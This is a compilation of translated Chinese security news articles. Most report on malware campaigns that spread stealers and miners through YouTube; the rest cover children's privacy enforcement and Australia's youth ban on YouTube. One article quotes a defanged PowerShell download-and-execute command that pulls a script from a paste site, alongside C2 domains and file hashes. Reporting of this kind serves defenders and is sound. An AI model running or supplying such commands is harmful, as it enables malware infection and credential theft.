HackerNews 编译，转载请注明出处： 一个恶意YouTube账号网络被曝光，该网络通过发布和推广诱导用户下载恶意软件的视频，滥用了这一视频托管平台的普及度和用户信任来传播恶意负载。 该网络自2021年开始活跃，迄今已发布了超过3000个恶意视频，且自今年年初以来此类视频数量增加了两倍。Check Point将其命名为”YouTube幽灵网络”。谷歌已介入移除了其中大部分视频。 该活动利用被黑客入侵的账号，将其内容替换为以盗版软件和Roblox游戏作弊工具为中心的”恶意”视频，从而感染那些搜索这些内容而不幸中招的用户，使其感染信息窃取程序。其中一些视频的观看量高达数十万次，范围在14.7万到29.3万之间。 “这次行动利用了包括观看量、点赞和评论在内的信任信号，使恶意内容看起来安全，” Check Point 安全研究组经理 Eli Smadja 说。”看似有用的教程，实际上可能是一个精巧的网络陷阱。这个网络的规模、模块化和复杂程度，为威胁行为体如何武器化互动工具来传播恶意软件提供了一个蓝图。” 利用YouTube分发恶意软件并非新现象。多年来，威胁行为体一直被观察到劫持合法频道或使用新创建的账号发布教程式视频，并在描述中提供恶意链接，点击后会导致恶意软件感染。 这些攻击是更广泛趋势的一部分，攻击者将合法平台重新用于邪恶目的，将其变为有效的恶意软件分发渠道。虽然一些活动滥用了与谷歌或必应等搜索引擎相关的合法广告网络，但其他活动则利用GitHub作为传播载体，例如”Stargazers幽灵网络”案例。 “幽灵网络”能够大行其道的主要原因之一是，它们不仅可用于放大所分享链接的感知合法性，而且由于其基于角色的结构，即使在账号被平台所有者封禁或删除后，仍能保持运营连续性。 “这些账号利用各种平台功能，如视频、描述、帖子和评论来推广恶意内容并分发恶意软件，同时制造一种虚假的信任感，”安全研究员 Antonis Terefos 表示。 “该网络大部分由被入侵的YouTube账号组成，这些账号一旦被纳入，就会被分配特定的操作角色。这种基于角色的结构实现了更隐蔽的分发，因为被禁账号可以迅速被替换，而不会中断整体运营。” 具体存在三种类型的账号： 视频账号：上传诱导性视频，并在描述中提供下载所宣传软件的链接（或者，链接以置顶评论的形式分享，或直接在视频中作为安装过程的一部分提供）。 帖子账号：负责发布包含外部网站链接的社区消息和帖子。 互动账号：负责点赞和发布鼓励性评论，为视频披上信任和可信度的外衣。 这些链接将用户引导至各种服务，如MediaFire、Dropbox或Google Drive，或托管在Google Sites、Blogger和Telegraph上的钓鱼页面，这些页面进而包含下载所谓软件的链接。在许多情况下，链接使用URL缩短器进行隐藏以掩盖真实目的地。 通过YouTube幽灵网络分发的一些恶意软件家族包括Lumma Stealer、Rhadamanthys Stealer、StealC Stealer、RedLine Stealer、Phemedrone Stealer以及其他基于Node.js的加载器和下载器： 一个名为 @Sound_Writer（拥有9690名订阅者）的频道，被入侵超过一年，用于上传加密货币软件视频以部署Rhadamanthys。 一个名为 @Afonesio1（拥有12.9万名订阅者）的频道，在2024年12月3日和2025年1月5日被入侵，上传了一个宣传Adobe Photoshop破解版的视频，用于分发一个MSI安装程序，该安装程序会部署Hijack Loader，进而传递Rhadamanthys。 “恶意软件分发方法的持续演变，表明了威胁行为体在绕过传统安全防御方面卓越的适应性和资源丰富性，” Check Point 表示。”对手正越来越多地转向更复杂的、基于平台的策略，最显著的是部署’幽灵网络’。” “这些网络利用合法账号固有的信任以及流行平台的互动机制，来策划大规模、持久且高效的恶意软件活动。”   消息来源：thehackernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 某行业监管机构发现，知名 YouTube 博主 “野兽先生”（MrBeast，本名吉米・唐纳森）在未获得家长同意的情况下收集儿童信息，这一问题促使其频道的数据收集及广告投放流程全面整改。 美国商业改进局全国项目（BBB National Programs）旗下的 “儿童广告审查组”（CARU）于周四表示，唐纳森违反了该机构的隐私准则，且其行为可能触犯了美国联邦《儿童在线隐私保护规则》（COPPA）。根据《儿童在线隐私保护规则》（COPPA）规定，网站在收集、使用或共享 13 岁以下儿童的个人信息前，必须获得家长可验证的同意。 该监管机构指出，唐纳森的 YouTube 频道拥有 4.36 亿订阅者，此次违规源于他向观众发起两项抽奖活动时，未提供任何让参与者填写家长或监护人信息的渠道，导致无法获取相关同意授权。 据 “儿童广告审查组”（CARU）透露，唐纳森向包括 13 岁以下儿童在内的受众承诺，参与者只要频繁提交 “已购买其关联品牌‘Feastables’巧克力棒” 的二维码凭证，获奖者便可获得 1 万美元奖金。 而参与该抽奖活动的用户需提供全名、电话号码、地址及电子邮箱等信息。 此外，“Feastables” 官网还存在不当行为：网站弹出全屏弹窗，反复要求访客提供电子邮箱地址，并显示 “野兽先生邀你加入‘团队’”（MrBeast Wants You to Join the Crew）的诱导语。 监管机构工作人员通过测试发现，在输入电子邮箱地址后，网站会弹出第二个弹窗，要求用户填写电话号码；且用户提供的邮箱与电话联系方式随后会被发送至第三方。 “儿童广告审查组”（CARU）表示，唐纳森已与该机构合作，更新了其频道的数据收集流程，并已解决相关问题。 “Feastables” 品牌发布声明称，“认可 CARU 推动负责任儿童广告的使命”，但同时指出，“并不认同该决定中的所有结论及其依据的前提”。 声明还提到：“尽管如此，‘野兽先生’与‘Feastables’在未来策划面向儿童群体的广告内容时，定会认真考虑 CARU 提出的关切。”   消息来源：therecord.media； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 美国联邦贸易委员会（FTC）于周二宣布，迪士尼公司已同意支付1000万美元，以和解有关其在未通知父母或获得同意的情况下，从观看YouTube视频的儿童那里收集个人数据的指控。 根据FTC的移交，美国司法部提起了诉讼，指控迪士尼违反了《儿童在线隐私保护规则》（COPPA），因其未将“大量”上传至YouTube的视频标注为“面向儿童”。 被指定为面向儿童的视频会禁用定向广告。诉状称，迪士尼的行为使得儿童在未经父母通知或同意的情况下被收集个人数据，并据此成为定向广告的目标。 FTC在一份新闻稿中表示，其拟议的命令将要求迪士尼改变在流媒体服务上指定面向儿童视频的方式，并将推动YouTube开始使用年龄验证技术。 COPPA规则于今年1月更新，要求父母选择同意第三方向儿童投放广告。该规则强制要求网站和在线服务在收集、使用或分享13岁以下儿童的个人信息之前，必须获得可验证的父母同意。 诉状称，自2020年以来，迪士尼已向超过1250个YouTube频道上传了数万个视频。仅2020年三个月内，上传到三十多个迪士尼频道的视频就在美国获得了12亿次观看。 其中许多视频未被正确标注为面向儿童。诉状称，这家娱乐巨头从此做法中获利颇丰。 迪士尼从YouTube在这些视频上投放的广告中获得部分广告收入。它也会在一部分视频上投放自己的广告。 2019年11月，YouTube告知迪士尼，必须上报其上传的内容是否面向儿童，以确保符合COPPA。YouTube根据迪士尼是否将内容标注为“面向儿童”来决定允许哪些广告行为。 诉状称，迪士尼以“非面向儿童”标签发布的视频包括米老鼠卡通片段以及《冰雪奇缘》、《魔法满屋》、《海洋奇缘》、《赛车总动员》、《魔发奇缘》、《美食总动员》和《玩具总动员》等面向儿童电影的片段。 诉状称，YouTube早在2020年6月就告知迪士尼其未能正确标注视频，但迪士尼未能解决此问题。 迪士尼的一位发言人没有回复置评请求。 FTC主席安德鲁·弗格森在一份预备声明中表示：“此案强调了FTC执行COPPA的决心，该法案由国会颁布，旨在确保由父母而非迪士尼等公司来决定其孩子个人信息在网上的收集和使用。” 除了1000万美元的罚款外，拟议的和解方案还要求迪士尼在收集13岁以下儿童的个人数据前开始通知父母，并根据COPPA获得他们的同意。 迪士尼还被要求启动一个项目，以确保其上传到YouTube的视频被正确指定为面向儿童。然而，如果YouTube部署了自己的年龄验证技术，该命令的此条款将被取消。     消息来源：therecord； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 澳大利亚宣布自12月起禁止16岁以下未成年人注册YouTube账号。总理安东尼·阿尔巴尼斯表示，YouTube将被纳入需验证用户年满16岁才能注册的社交媒体平台范畴。2024年11月，澳大利亚众议院已通过法案，禁止16岁以下人群在Facebook、Instagram、Snapchat、TikTok及X平台创建账户。 该禁令旨在遏制社交媒体对青少年身心健康的多重负面影响，包括社交孤立、睡眠障碍、行为成瘾及生活满意度降低。阿尔巴尼斯总理强调：“我希望孩子们放下电子设备，走向足球场、游泳池和网球场。他们需要真实的人际互动体验，因为社交媒体正在造成社会伤害。” 本周三（7月30日），通讯部长安妮卡·威尔斯发布新规，明确界定“限制年龄的社交媒体平台”范围。此前被豁免的YouTube此次被正式列入需验证用户年龄的平台名单。威尔斯援引政府研究数据称：“证据表明，近四成澳大利亚儿童报告称最近受到的网络伤害来自YouTube。保护儿童网络安全是不可妥协的底线，我们不会被法律威胁所震慑。”她同时透露，违规平台将面临最高4950万澳元罚款，新规将于12月10日生效。 YouTube发言人回应称：“政府的决定推翻了此前明确公开承诺的‘YouTube不受禁令约束’立场。我们与政府减少网络危害的目标一致，但坚持认为YouTube是提供高质量内容的视频分享平台而非社交媒体。我们将评估后续行动并保持沟通。” 该禁令引发全球多国关注：挪威正考虑对15岁以下群体实施社媒禁令；法国与丹麦更倾向推动欧盟统一监管；英国仍在权衡禁令可行性。澳大利亚也成为全球首个将YouTube纳入未成年人禁令范围的立法国家。       消息来源：cybernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： YouTube 上推广游戏外挂的视频被用于传播一种名为 Arcane 的未被记录在案的盗取器恶意软件，该软件可能针对俄语用户。 卡巴斯基在一份分析报告中表示：“这种恶意软件的有趣之处在于它收集的信息量之大。”它会从 VPN 和游戏客户端，以及 ngrok、Playit、Cyberduck、FileZilla 和 DynDNS 等各种网络工具中抓取账户信息。 攻击链涉及在 YouTube 视频中分享指向受密码保护的存档文件的链接，打开后，该存档文件会解压出一个名为 start.bat 的批处理文件，该文件负责通过 PowerShell 检索另一个存档文件。 随后，该批处理文件利用 PowerShell 启动新下载存档文件中嵌入的两个可执行文件，同时禁用 Windows SmartScreen 保护功能，并将每个驱动器根文件夹设置为 SmartScreen 过滤器的例外。 这两个二进制文件中，一个是加密货币矿工，另一个是名为 VGS 的盗取器，它是 Phemedrone 盗取器恶意软件的一个变种。截至 2024 年 11 月，攻击者已被发现用 Arcane 替代了 VGS。 “尽管其中很多内容是从其他盗取器中借鉴而来的，但我们无法将其归因于任何已知的家族。”这家俄罗斯网络安全公司指出。 除了从各种基于 Chromium 和 Gecko 的浏览器中窃取登录凭证、密码、信用卡数据和 Cookie 外，Arcane 还能够收集全面的系统数据，以及以下多个应用程序的配置文件、设置和账户信息： VPN 客户端：OpenVPN、Mullvad、NordVPN、IPVanish、Surfshark、Proton、hidemy.name、PIA、CyberGhost 和 ExpressVPN 网络客户端和工具：ngrok、Playit、Cyberduck、FileZilla 和 DynDNS 通讯软件：ICQ、Tox、Skype、Pidgin、Signal、Element、Discord、Telegram、Jabber 和 Viber 电子邮件客户端：Microsoft Outlook 游戏客户端和服务：Riot Client、Epic、Steam、Ubisoft Connect（原 Uplay）、Roblox、Battle.net 以及各种 Minecraft 客户端 加密货币钱包：Zcash、Armory、Bytecoin、Jaxx、Exodus、Ethereum、Electrum、Atomic、Guarda 和 Coinomi 此外，Arcane 还被设计为能够截取受感染设备的屏幕截图，枚举正在运行的进程，并列出已保存的 Wi-Fi 网络及其密码。 “大多数浏览器会生成唯一密钥，用于加密其存储的敏感数据，如登录信息、密码、Cookie 等。”卡巴斯基表示，“Arcane 利用数据保护 API（DPAPI）获取这些密钥，这是盗取器的典型行为。” “但 Arcane 还包含一个名为 Xaitax 的工具的可执行文件，它利用该工具破解浏览器密钥。为此，该工具会被秘密地写入磁盘并启动，盗取器从其控制台输出中获取所需的全部密钥。” 此外，该盗取器恶意软件还采用了一种单独的方法，通过调试端口启动浏览器副本，从而从基于 Chromium 的浏览器中提取 Cookie。 该行动背后的不明威胁行为者已经扩大了他们的业务范围，包括一个名为 ArcanaLoader 的加载器，该加载器声称用于下载游戏外挂，但实际上却传播盗取器恶意软件。俄罗斯、白俄罗斯和哈萨克斯坦已成为此次行动的主要目标。 “这场特定的活动之所以有趣，是因为它展示了网络犯罪分子的灵活性，他们始终在更新他们的工具和分发方法。”卡巴斯基表示，“此外，Arcane 盗取器本身也很有趣，因为它收集了各种不同的数据，并且使用了各种技巧来提取攻击者想要的信息。” 消息来源：TheHackerNews； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 网络犯罪分子通过发送虚假的版权索赔来勒索 YouTubers，迫使他们在视频中推广恶意软件和加密货币矿工。 这些威胁行为者利用 Windows Packet Divert (WPD) 工具在俄罗斯的流行程度，这些工具帮助用户绕过互联网审查和政府对网站及在线服务的限制。 YouTubers 为迎合这一受众群体，发布了关于如何使用各种基于 WPD 的工具绕过审查的教程，并成为威胁行为者的目标，这些行为者伪装成这些工具的版权持有者。 在大多数情况下，威胁行为者声称是所展示限制绕过工具的原始开发者，向 YouTube 提出版权索赔，然后联系创作者，提供解决方案，即在视频中包含他们提供的下载链接。 同时，他们威胁说，如果不遵守，将在 YouTube 上再增加两次“打击”，根据平台的“三次打击”政策，可能导致频道被封禁。 在其他情况下，攻击者直接联系创作者，伪装成工具的开发者，声称原始工具有一个新版本或新的下载链接，要求创作者在视频中更改链接。 YouTubers 出于对失去频道的担忧，屈服于威胁行为者的勒索，同意在视频中添加指向托管这些所谓的 WPD 工具的 GitHub 存储库的链接。然而，这些是被植入木马的版本，包含了一个加密矿工下载器。 卡巴斯基观察到这种推广被植入木马的 WPD 工具的行为发生在一段有超过 400,000 次观看的 YouTube 视频中，恶意链接在被移除前达到了 40,000 次下载。 一个拥有 340,000 订阅者的 Telegram 频道也以同样的伪装推广了恶意软件。 “根据我们的遥测，这场恶意软件活动已经影响了俄罗斯 2,000 多名受害者，但实际数字可能更高，”卡巴斯基警告说。 恶意软件加载程序是从 GitHub 存储库下载的包含 Python 恶意软件加载程序的恶意存档，通过修改后的启动脚本（“general.bat”）使用 PowerShell 启动。 如果受害者的防病毒软件干扰了这一过程，启动脚本会提示用户禁用防病毒软件并重新下载文件。 可执行文件仅针对俄罗斯 IP 地址获取第二阶段加载程序并在设备上执行。 第二阶段负载是另一个可执行文件，其大小被膨胀到 690 MB 以逃避防病毒分析，同时它还具备反沙盒和虚拟机检查功能。 恶意软件加载程序通过添加排除项和创建名为 “DrvSvc” 的 Windows 服务来关闭 Microsoft Defender 保护，以实现重启后的持久性。 最终，它下载最终负载，SilentCryptoMiner，这是一个修改版的 XMRig，能够开采多种加密货币，包括 ETH、ETC、XMR 和 RTM。 coin miner 每 100 分钟从 Pastebin 获取远程配置，以便动态更新。 为了逃避检测，它被加载到如 “dwm.exe” 的系统进程中，使用进程空心化技术，并在用户启动如 Process Explorer 和 Task Manager 的监控工具时暂停挖矿活动。 尽管卡巴斯基发现的这场活动主要针对俄罗斯用户，但相同的策略也可能被用于更广泛范围的操作，这些操作还可能投放信息窃取器或勒索软件等风险更高的恶意软件。 用户应避免从 YouTube 视频或描述中的网址下载软件，尤其是来自较小到中等规模的频道，这些频道更容易受到欺诈和勒索的影响。   消息来源：The Hacker News；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： YouTube 近日警告创作者，提防一种新的网络钓鱼骗局，诈骗者利用 AI 生成的首席执行官 Neal Mohan 视频来诱骗用户。骗子通过私密分享的方式传播伪造视频，谎称 YouTube 正在调整盈利政策，实则企图窃取用户凭据。 YouTube 表示：“YouTube 及员工不会通过私密视频联系用户或提供信息。如果你收到自称来自 YouTube 的私密视频，那就是一场网络钓鱼骗局。” 据外媒 The Verge 报道，近来，Reddit 上有用户报告称遇到类似骗局。一名用户透露，他们收到一封邮件，称“Notification for YouTube Creators”账户向其分享了一段私密视频，并要求下载恶意文件。另一名用户则表示，他们收到“Channel for Creators”分享的视频，被引导至一个伪造的 DocuSign 网站，同意所谓的新盈利政策。而这两封邮件的发件人均显示为看似官方的“no-reply@youtube.com”。 YouTube 进一步警告，诈骗者正利用平台功能伪装成官方账号，引导创作者点击恶意链接。这类骗局并不新鲜，早在 2023 年，就有 Reddit 用户发现过 Neal Mohan 的 AI 伪造视频。 为了防范这类骗局，YouTube 提供了以下建议： 不要点击不明链接：特别是那些通过私密视频或邮件发送的链接。 提高警惕：不要轻易相信未经验证的视频或邮件。 报告可疑活动：如果发现可疑的视频或邮件，及时向 YouTube 官方报告。 YouTube 还在其帮助中心提供了防范和举报钓鱼邮件的建议，并推出了新的支持助手，帮助用户恢复被黑客攻击的账户。   消息来源：Bleeping Computer； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 新一波的 “自骗” 攻击浪潮正在利用 AI 生成的深度伪造视频和恶意脚本，目标锁定加密货币爱好者和金融交易者，标志着社会工程战术的危险演变。 据网络安全研究公司 Gen Digital 发现，这场活动利用经过验证的 YouTube 频道、合成人物和 AI 制作的有效载荷，操纵受害者主动破坏自己的系统。 这种攻击在 2024 年第三季度激增了 614%，结合了尖端的深度伪造技术和精心设计的心理诱饵，引发了对生成式 AI 在网络犯罪中武器化的紧迫担忧。 安全分析师指出，该操作始于一个托管在拥有 11 万订阅者的被攻陷 YouTube 频道上的深度伪造视频。 视频中出现了一个名为 “托马斯・哈里斯” 或 “托马斯・罗伯茨” 的合成人物，利用先进的面部动画、语音合成和身体动作复制技术制作而成。 尽管该频道看起来合法，包括从 TradingView 重新发布的内 容，但未列出的教程视频指导观众激活一个虚构的 “AI 驱动的开发者模式”，声称该模式可以以 97% 的准确率预测加密货币市场趋势。 攻击的核心在于使用 AI 生成的脚本设计来规避怀疑。观众被引导打开 Windows 的运行对话框（Win+R）并执行一个从 paste-sharing 网站（如 Pastefy[.]com 或 Obin[.]net）获取恶意脚本的 PowerShell 命令。 研究人员解密的一个代表性有效载荷显示攻击者使用 ChatGPT 来优化他们的代码： iex (New-Object Net.WebClient).DownloadString(‘hxxps://pastefy[.]com/raw/AbCdE123’) 该脚本连接到一个命令与控制（C&C）服务器——最近被追踪为 developer-update[.]dev 或 developerbeta[.]dev——以部署 Lumma Stealer 或 NetSupport 远程访问工具。 前者窃取加密货币钱包和浏览器凭据，而后者则授予对系统的完全控制。取证分析揭示了关键组件的 SHA-256 哈希值，包括： a5e0635363bbb5d22d5ffc32d9738665942abdd89d2e6bd1784d6a60ac521797（恶意 PowerShell 脚本） 2fe60aa1db2cf7a1dc2b3629b4bbc843c703146f212e7495f4dc7745b3c5c59e（Lumma Stealer 变种） 至关重要的是，深度伪造视频通过程序细节隐藏了其人工性质——一个合成声音解释了如何通过添加注册表排除项来绕过 Windows Defender，而屏幕上的按键操作则模仿了真实的 TradingView 工作流程。 攻击者还通过 YouTube 的赞助广告系统进一步扩大了攻击范围，针对观看合法金融内容的用户。 与传统的网络钓鱼不同，受害者主动参与了他们的系统被破坏的过程，认为他们正在访问独家工具。随着网络犯罪分子现在正在自动化人物创建和脚本优化，通过多个渠道验证数字指令已成为一种不可或缺的安全实践。   消息来源：Cybersecurity News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

最近，卡巴斯基实验室的网络安全分析师发现，黑客一直在频繁利用 YouTube平台来传播复杂的恶意软件。通过劫持热门频道，黑客伪装成原始创作者发布恶意链接，对用户实施诈骗。 图片来源：FreeBuf 研究发现，攻击者曾在 2022 年实施了一项复杂的加密货币挖掘活动，目标主要针对俄罗斯用户。攻击者使用多种攻击媒介（包括被劫持的 YouTube 账户 ）来分发伪装成如uTorrent、Microsoft Office和Minecraft等流行应用的恶意文件。 感染链始于 “受密码保护的 MSI 文件”，其中包含触发多阶段攻击序列的 VBScript，包括利用隐藏在合法数字签名 DLL 中的 AutoIt 脚本，将权限升级到 SYSTEM 级。 这是一种在隐藏 “恶意代码 “的同时保持签名有效性的技术。 该恶意软件通过 WMI 事件过滤器、注册表修改（特别针对 图像文件执行选项、调试器和MonitorProcess 键）以及滥用开源Wazuh SIEM 代理进行远程访问等多种机制建立了持久性。 此外，攻击者采用了复杂的防御规避技术（通 explorer.exe进程镂空、反调试检查和使用基于特殊 GUID 的目录名操纵文件系统）来隐藏恶意组件。 卡巴斯基表示，最终有效载荷部署为SilentCryptoMiner，用于挖掘Monero和Zephyr等注重隐私的加密货币，同时实施基于进程的隐身机制以逃避检测。 该恶意软件还收集系统遥测数据（包括CPU 规格、GPU 详细信息、操作系统版本和防病毒信息）并通过 Telegram 机器人 API 进行传输，其中一些变体包括剪贴板劫持功能，特别针对加密货币钱包地址。 除了针对俄罗斯用户，这一恶意活动还针对来自白俄罗斯、印度、乌兹别克斯坦、哈萨克斯坦、德国、阿尔及利亚、捷克、莫桑比克和土耳其的用户。由于这些用户经常自愿禁用 AV 工具的保护和安全措施来安装非官方软件，因此特别容易受到攻击。 这种攻击的复杂性体现在其模块化结构上，即可以根攻击者的目标动态加载不同的有效载荷组件，表明大规模活动可通过先进的混淆方法和反分析功能，在保持隐蔽性的同时融入复杂的企业级攻击技术。 参考来源：Hackers Using YouTube Videos To Deliver Sophisticated Malware     转自FreeBuf，原文链接：https://www.freebuf.com/news/412529.html 封面来源于网络，如有侵权请联系删除

最近，Fortinet专家发现了一种新的网络威胁：攻击者正利用与盗版软件相关的YouTube视频分发名为Lumma的数据窃取程序。 这些视频通常包含有关被黑客入侵的应用程序的信息，其安装说明相似，并包含恶意URL。这些URL通常通过服务如TinyURL和Cuttly进行缩短。 长期以来，这种方法一直被用来传播各种恶意软件，包括数据盗窃、加密货币和非法挖矿恶意软件。需要注意的是，这些欺诈视频有可能在热门视频平台上保留较长时间，然后被删除，但很快之后又会被大量重新上传。 在最近发生的网络攻击中，攻击者有针对在YouTube上搜索合法视频编辑器（例如Vegas Pro）的用户。攻击手法包括在网络钓鱼视频中使用社会工程技术，诱使观看者点击视频描述中的链接。这导致用户从MediaFire文件共享服务下载被植入恶意代码的安装程序。 安装程序包含一个伪装成安装可执行文件的恶意LNK文件。该LNK文件会通过从GitHub存储库进行静默下载，获取.NET加载程序。随后，Lumma Stealer除了检查虚拟机上是否正在运行恶意软件之外，还开始在受感染的系统上执行操作。 Lumma infostealer是一款使用C语言编写的恶意软件，自从2022年底以来已在地下论坛上出售。该恶意软件具备收集敏感数据的能力，并将这些数据传输到攻击者控制的服务器。据一些报告称，Lumma infostealer首次在2018年的实际攻击中被发现。 在2023年10月，我们发布了一份报告，详细描述了这种恶意软件通过Discord机器人，利用游戏玩家流行平台的API进行传播的情况。 为了有效防范Lumma等信息窃取者和其他网络威胁，建议在下载应用程序之前三思而后行，尽量使用官方渠道下载任何软件，并获得可靠的防病毒解决方案以进一步提高安全性。   转自安全客，原文链接：https://www.anquanke.com/post/id/292492 封面来源于网络，如有侵权请联系删除